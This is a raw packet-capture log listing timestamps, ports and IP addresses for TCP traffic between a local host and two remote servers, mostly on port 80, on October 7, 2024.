Oct 7, 2024 03:15:43.992755890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992770910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992789030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992799044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992844105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992849112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992899895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992899895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992934942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.992949963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992984056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.992990971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993043900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993043900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993096113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993097067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993139982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993145943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993191004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993208885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993244886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993259907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993300915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993318081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993352890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993355989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993386984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993421078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993427038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993427038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993455887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993470907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993489981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993505955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993522882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993546963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993555069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993567944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993587971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993603945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993622065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993642092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993654013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993669987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993689060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993705034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993733883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993737936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993768930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993784904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993801117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993820906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993834019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993850946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993866920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993884087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993901014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993916988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993930101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993954897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993963003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.993985891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.993994951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994007111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994038105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994045019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994072914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994088888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994103909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994124889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994137049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994151115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994172096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994193077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994210005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994218111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994242907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994278908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994313002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994345903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994410992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994429111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994429111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994429111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994429111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994429111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994445086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994473934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994508028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994518042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994518042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994518042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994543076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994556904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994575977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994611025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994612932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994635105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994643927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994676113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994678020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994694948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994716883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994740963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994741917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994755983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994769096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994772911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994788885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994791985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994805098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994808912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994829893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994832039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994847059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994848967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994863033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994879007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994884968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994895935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994913101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994914055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994930029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994946003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994946957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994961977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994970083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.994978905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994995117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.994997025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.995011091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.995028019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.995028973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.995044947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.995049953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.995060921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.995076895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.995078087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.995093107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.995110035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.995110989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.995127916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.995131016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.995160103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.995187998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.995623112 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.995793104 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.995872974 CEST	49860	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.997278929 CEST	49860	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.997306108 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.997323036 CEST	49860	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.997330904 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.000380993 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.000415087 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.000540972 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.000686884 CEST	49865	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.000698090 CEST	443	49865	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.081808090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.081866026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.081899881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.081955910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.081993103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082046032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082050085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082050085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082050085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082081079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082091093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082114935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082132101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082148075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082164049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082182884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082195044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082230091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082237005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082271099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082285881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082324028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082335949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082360029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082375050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082411051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082413912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082448006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082464933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082495928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082499981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082535982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082550049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082576036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082588911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082611084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082626104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082643986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082659960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082678080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082691908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082727909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082734108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082767963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082778931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082802057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082815886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082833052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082849979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082880974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082882881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082917929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.082932949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082968950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.082968950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083004951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083014965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083054066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083061934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083096027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083112955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083146095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083148003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083195925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083201885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083235025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083250046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083287001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083290100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083336115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083342075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083395004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083424091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083458900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083468914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083503008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083511114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083555937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083561897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083596945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083611012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083631992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083650112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083683968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083718061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083734989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083750963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083765030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083787918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083801031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083822012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083837032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083856106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083873034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083889961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083906889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083926916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.083939075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083976030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.083980083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084028959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084031105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084080935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084084034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084116936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084146023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084151030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084177971 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084183931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084207058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084219933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084228039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084253073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084268093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084285975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084317923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084335089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084352016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084373951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084388018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084407091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084422112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084439993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084455967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084480047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084492922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084510088 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084527016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084541082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084559917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084572077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084593058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084618092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084626913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084645987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084659100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084673882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084692001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084707022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084723949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084758997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084793091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084825993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084829092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084858894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084861994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084877014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084892035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084908962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084925890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084939957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084959030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.084973097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.084991932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085006952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085025072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085037947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085059881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085069895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085094929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085108995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085128069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085141897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085161924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085196972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085205078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085230112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085258961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085263014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085274935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085297108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085330009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085344076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085362911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085390091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085396051 CEST	80	49782	95.164.90.97	192.168.2.5
